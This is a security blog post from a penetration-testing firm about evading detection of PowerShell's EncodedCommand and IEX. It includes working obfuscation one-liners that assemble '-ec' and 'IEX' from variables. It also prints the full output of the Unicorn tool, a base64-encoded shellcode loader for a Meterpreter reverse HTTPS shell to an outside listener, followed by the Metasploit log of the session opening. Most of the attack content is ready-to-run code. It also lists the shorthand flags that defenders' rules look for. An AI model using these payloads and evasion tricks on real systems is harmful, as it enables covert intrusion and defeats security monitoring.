Skip to Main Content
January 25, 2017

Circumventing EncodedCommand and IEX Detection in PowerShell

Written by David Kennedy
PowerShell continues to be one of the hot topics for security conferences and something that is actively being used both for offense and for defense. Defenders are getting smarter when it comes to detecting potentially malicious uses of PowerShell through a number of methods. There's a number of methods that are used for legitimate and illegitimate purposes. Methods like Invoke-Expression or IEX are commonly used almost as much as the EncodedCommand method. EncodedCommand for those that are not familiar is a way to execute base64 encoded powershell code and have it execute which skirts (by design) around the Execution Policies in PowerShell. powershell -EncodedCommand There are 15 different iterations to shorthand EncodedCommand which defenders will typically attempt to key off on. One of the most unknown ones is "-ec" which is shorthanded for "-encodedcommand". Shorthand encodedcommand that should be added to detection rules below: -e -ec -en -enc -enco -encod -encode -encoded -encodedc -encodedco -encodedcom -encodedcomm -encodedcomma -encodedcomman -encodedcommand Defenders typically try to flag on these and weed out false positives in order to identify encodedcommand traffic through the network. Either through tools or through event logs. There are fantastic ways to get around these for example leveraging Daniel Bohannon's "Invoke-Obfsucation" https://github.com/danielbohannon/Invoke-Obfuscation (super awesome and amazing btw) which will take a .ps1 file for you and mangle it beyond readable with some awesome obfuscation. For attackers though - leaving a ps1 file on disk is often not the desired method and if we can remain off disk, that is the most desirable method. Dave Kennedy, Shawn Sullivan, Martin Bos, and Ben Ten were recently on a red team exercise where a customer had great detection capabilities around EncodedCommand and application whitelisting that disallowed any PS1 file execution. In this scenario we needed a way to get around detection and prevention methods within the network. We decided to use the Unicorn method and came up with a new technique for circumventing detection rules moving forward. Unicorn is a tool that TrustedSec developed a long time ago that uses an x86 downgrade attack for shellcode to execute Metasploit shells in memory without touching disk (<3 Matt Graeber #KeepMattHappy). In order to circumvent -e[.*] regex we needed another method in order to get around the detection rules. What we needed was something small - especially with Meterpreter Reverse HTTPS this can typically be large. Additionally we wanted it to fit in multiple other methods such as PowerShell Empire and Cobalt Strike EncodedCommand payload delivery. What we decided to do was use powershell commands and leverage set-variables with .value.toString() in order to piece together our -ec command into the command line. This allows us to specify -ec without ever calling -ec which would be hit by detection rules.
powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() 
This can be shortened extensively by using shorthand:
powershell -window hidden -C "sv x -;sv y ec;sv Z ((gv x).value.toString()+(gv y).value.toString());powershell (gv Z).value.toString()"
This assigns a variable (randomized in Unicorn) that brings get-variable X.value.toString() which converts it to a string of -ec. This allows us to execute EncodedCommand without having to actually use -ec anywhere in our PowerShell command and circumvent detection rules. Unicorn has been updated to version 2.4 which now incorporates this bypass method. An example of the Unicorn output:
root@stronghold:/home/relik/Desktop/git/unicorn# python unicorn.py windows/meterpreter/reverse_https 192.168.5.23 443
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:
                
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.

[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
If you open up the powershell_attack.txt:
powershell -window hidden -C "set-variable -name "C" -value "-"; set-variable -name "s" -value "e"; set-variable -name "q" -value "c"; set-variable -name "P" -value ((get-variable C).value.toString()+(get-variable s).value.toString()+(get-variable q).value.toString()) ; powershell (get-variable P).value.toString() JABSAEkAUgAgAD0AIAAnACQAWgBvAEkAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABaAG8ASQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAYQAsADAAeAAxAGYALAAwAHgAYwBjACwAMAB4ADMAOQAsADAAeABjADQALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAZgAxACwAMAB4ADMAMAAsADAAeABkAGIALAAwAHgAMwAxACwAMAB4AGYAMQAsADAAeAAyADEALAAwAHgAOQBlACwAMAB4AGIAYQAsADAAeAAwADkALAAwAHgAYgAyACwAMAB4AGYAZgAsADAAeAAzADMALAAwAHgAZQBjACwAMAB4ADgAMwAsADAAeAAzAGYALAAwAHgAMgA3ACwAMAB4ADYANQAsADAAeABiADMALAAwAHgAOABmACwAMAB4ADIAMwAsADAAeAAyAGIALAAwAHgAMwA4ACwAMAB4ADcAYgAsADAAeAA2ADEALAAwAHgAZABmACwAMAB4AGMAYgAsADAAeAAwADkALAAwAHgAYQBlACwAMAB4AGQAMAAsADAAeAA3AGMALAAwAHgAYQA3ACwAMAB4ADgAOAAsADAAeABkAGYALAAwAHgANwBkACwAMAB4ADkANAAsADAAeABlADkALAAwAHgANwBlACwAMAB4AGYAZQAsADAAeABlADcALAAwAHgAMwBkACwAMAB4AGEAMAAsADAAeAAzAGYALAAwAHgAMgA4ACwAMAB4ADMAMAAsADAAeABhADEALAAwAHgANwA4ACwAMAB4ADUANQAsADAAeABiADkALAAwAHgAZgAzACwAMAB4AGQAMQAsADAAeAAxADEALAAwAHgANgBjACwAMAB4AGUAMwAsADAAeAA1ADYALAAwAHgANgBmACwAMAB4AGEAZAAsADAAeAA4ADgALAAwAHgAMgA1ACwAMAB4ADYAMQAsADAAeABiADUALAAwAHgANgBkACwAMAB4AGYAZAAsADAAeAA4ADAALAAwAHgAOQA0ACwAMAB4ADIAMAAsADAAeAA3ADUALAAwAHgAZABiACwAMAB4ADMANgAsADAAeABjADMALAAwAHgANQBhACwAMAB4ADUANwAsADAAeAA3AGYALAAwAHgAZABiACwAMAB4AGIAZgAsADAAeAA1ADIALAAwAHgAYwA5ACwAMAB4ADUAMAAsADAAeAAwAGIALAAwAHgAMgA4ACwAMAB4AGMAOAAsADAAeABiADAALAAwAHgANAA1ACwAMAB4AGQAMQAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADYAOQAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADMAYQAsADAAeAA0AGQALAAwAHgAZABiACwAMAB4ADAAYwAsADAAeAAzADIALAAwAHgAYQBkACwAMAB4ADYANgAsADAAeAAxADcALAAwAHgAOAAxACwAMAB4AGMAZgAsADAAeABiAGMALAAwAHgAOQAyACwAMAB4ADEAMQAsADAAeAA3ADcALAAwAHgAMwA2ACwAMAB4ADAANAAsADAAeABmAGQALAAwAHgAOAA5ACwAMAB4ADkAYgAsADAAeABkADMALAAwAHgANwA2ACwAMAB4ADgANQAsADAAeAA1ADAALAAwAHgAOQA3ACwAMAB4AGQAMAAsADAAeAA4AGEALAAwAHgANgA3ACwAMAB4ADcANAAsADAAeAA2AGIALAAwAHgAYgA2ACwAMAB4AGUAYwAsADAAeAA3AGIALAAwAHgAYgBiACwAMAB4ADMAZQAsADAAeABiADYALAAwAHgANQBmACwAMAB4ADEAZgAsADAAeAAxAGEALAAwAHgANgBjACwAMAB4AGMAMQAsADAAeAAwADYALAAwAHgAYwA2ACwAMAB4AGMAMwAsADAAeABmAGUALAAwAHgANQA4ACwAMAB4AGEAOQAsADAAeABiAGMALAAwAHgANQBhACwAMAB4ADEAMwAsADAAeAA0ADQALAAwAHgAYQA4ACwAMAB4AGQANgAsADAAeAA3AGUALAAwAHgAMAAxACwAMAB4ADQAMAAsADAAeAA4AGMALAAwAHgAZgA0ACwAMAB4AGQAMQAsADAAeABmADQALAAwAHgAMwA5ACwAMAB4ADkAZAAsADAAeABiAGYALAAwAHgANgBkACwAMAB4ADkAMgAsADAAeAAzADUALAAwAHgAMABjACwAMAB4ADEAOQAsADAAeAAzAGMALAAwAHgAYwAyACwAMAB4ADcAMwAsADAAeAAzADAALAAwAHgANwAxACwAMAB4ADEANwAsADAAeABkADgALAAwAHgAZQA4ACwAMAB4ADIAMQAsADAAeABmADQALAAwAHgAOABjACwAMAB4ADYANgAsADAAeABmAGMALAAwAHgAYQBjACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgAZgBmACwAMAB4ADgANQAsADAAeABmAGYALAAwAHgANABkACwAMAB4ADYAYQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAMQAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADUAMgAsADAAeABjADUALAAwAHgAZAAyACwAMAB4ADAAYgAsADAAeABkADgALAAwAHgAYwA1ACwAMAB4AGQAMgAsADAAeABjAGIALAAwAHgAYwBlACwAMAB4AGYAYwAsADAAeABiADQALAAwAHgAOQBiACwAMAB4ADIAOAAsADAAeABjAGEALAAwAHgAMwA4ACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgANgAzACwAMAB4AGIAMAAsADAAeABmADQALAAwAHgANwA3ACwAMAB4ADcANAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGIAZQAsADAAeABkADgALAAwAHgAZgAwACwAMAB4ADkAMwAsADAAeAAwAGMALAAwAHgAMwBmACwAMAB4ADgANAAsADAAeABjADAALAAwAHgAMgAzACwAMAB4AGUAYwAsADAAeABkADIALAAwAHgAYgA1ACwAMAB4ADkANQAsADAAeAA3AGEALAAwAHgAMwA2ACwAMAB4ADYAYwAsADAAeAAzADQALAAwAHgANAAwACwAMAB4ADMANwAsADAAeAA1AGIALAAwAHgAZABlACwAMAB4AGQAYwAsADAAeABjAGQALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeABhADAALAAwAHgAZQAxACwAMAB4AGMAMgAsADAAeAA0ADcALAAwAHgAMgA4ACwAMAB4AGUANQAsADAAeABhADgALAAwAHgANAAzACwAMAB4ADcAYQAsADAAeAA4AGMALAAwAHgAMwAzACwAMAB4ADEAYQAsADAAeAAxADIALAAwAHgAMgA1ACwAMAB4ADAAZAAsADAAeAAzAGMALAAwAHgANgA0ACwAMAB4ADMAYQAsADAAeAA0ADQALAAwAHgAMQAzACwAMAB4ADMAYQAsADAAeAA5ADYALAAwAHgAMwA1ACwAMAB4AGMAMgAsADAAeABkADQALAAwAHgAMwA1ACwAMAB4AGIAZgAsADAAeABmADIALAAwAHgANQBmACwAMAB4AGIAOQAsADAAeAA2AGEALAAwAHgAOAA3ACwAMAB4ADYAMAAsADAAeAAzADAALAAwAHgAOQBlACwAMAB4AGMANwAsADAAeAAxADUALAAwAHgANgAyACwAMAB4AGYANgAsADAAeAAyADcALAAwAHgANgAwACwAMAB4ADMANgAsADAAeAA1ADAALAAwAHgAMwA3ACwAMAB4ADUAZQAsADAAeAA1AGQALAAwAHgAMQBjACwAMAB4AGEAZgAsADAAeAA2ADEALAAwAHgAYgAyACwAMAB4ADkAYwAsADAAeAAyAGYALAAwAHgAMABhACwAMAB4AGIAMgAsADAAeAA5AGMALAAwAHgANgBmACwAMAB4AGMAYQAsADAAeABlADEALAAwAHgAZgA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgANQA2ACwAMAB4AGUAMQAsADAAeAAzADcALAAwAHgAYgBiACwAMAB4AGMAYQAsADAAeABiAGEALAAwAHgAOQA0ACwAMAB4AGMAZAAsADAAeAAwAGEALAAwAHgANgBiACwAMAB4ADcAMwAsADAAeABjAGUALAAwAHgAZgA0ACwAMAB4ADkAMwAsADAAeAA4ADMALAAwAHgAOQBkACwAMAB4AGEAMgAsADAAeABmAGIALAAwAHgAOQAxACwAMAB4AGIANwAsADAAeABjADIALAAwAHgAMQA5ACwAMAB4ADYAYQAsADAAeAA2ADIALAAwAHgANQAxACwAMAB4ADEAZAAsADAAeABlADEALAAwAHgANAAwACwAMAB4AGQAMQAsADAAeAA5AGEALAAwAHgAMABiACwAMAB4ADkAOAAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADcAZQAsADAAeABmAGIALAAwAHgAMwA0ACwAMAB4AGEANwAsADAAeABkAGUALAAwAHgAZQBiACwAMAB4AGIAMAAsADAAeABkADgALAAwAHgAMQBlACwAMAB4ADEANAAsADAAeAAwAGIALAAwAHgAMQBmACwAMAB4AGQAMwAsADAAeABjADUALAAwAHgANQBkACwAMAB4ADYAOQAsADAAeAAyAGIALAAwAHgAMwA0ACwAMAB4AGEAYgAsADAAeABiAGIALAAwAHgANwA5ACwAMAB4ADcAYgAsADAAeABkADMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADQAdgBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAA0AHYASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQANAB2AEgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABSAEkAUgApACkAOwAkAGIANABlAGEAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASAA3AFoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASAA3AFoAIAAkAGIANABlAGEAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAYgA0AGUAYQAgACQAZQAiADsAfQA="
Now that we have this, we can simply copy and paste this into one command line where we have remote command execution, and get our shell!
[02:14:52] TrustedSec MSF (s:0 j:1) exploit(handler) > 
[*] [2017.01.25-14:22:57] https://192.168.5.23:443 handling request from 192.168.5.44; (UUID: jwtqzcxn) 
Encoded stage with x86/shikata_ga_nai
[*] [2017.01.25-14:22:57] https://192.168.5.23:443 handling request from 192.168.5.44; (UUID: jwtqzcxn) 
Staging x86 payload (958561 bytes) ...
[*] Meterpreter session 1 opened (192.168.5.23:443 -> 192.168.5.44:51094) at 2017-01-25 14:22:58 -0500

[02:14:48] TrustedSec MSF (s:1 j:1) exploit(handler) > 
[02:14:48] TrustedSec MSF (s:1 j:1) exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
This is especially useful for detection and evasion. For defenders - unfortunately you need to look at how PowerShell is being used on your network and identify if .value.toString() is valid use in your network. This should also work for anything you're trying to sneak by including IEX which is commonly picked up. Example below:
powershell -window hidden -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() ('')"
Unicorn version 2.4 is now released. Unicorn will randomize all of the names so you can't trigger off of them. We will be updating the Social-Engineer Toolkit and other methods with this in the next release. Download Unicorn Special thanks to TrustedSec consultant Shawn Sullivan for the assist on the string conversion. Special thanks to Walter Legowski for the shorthand version.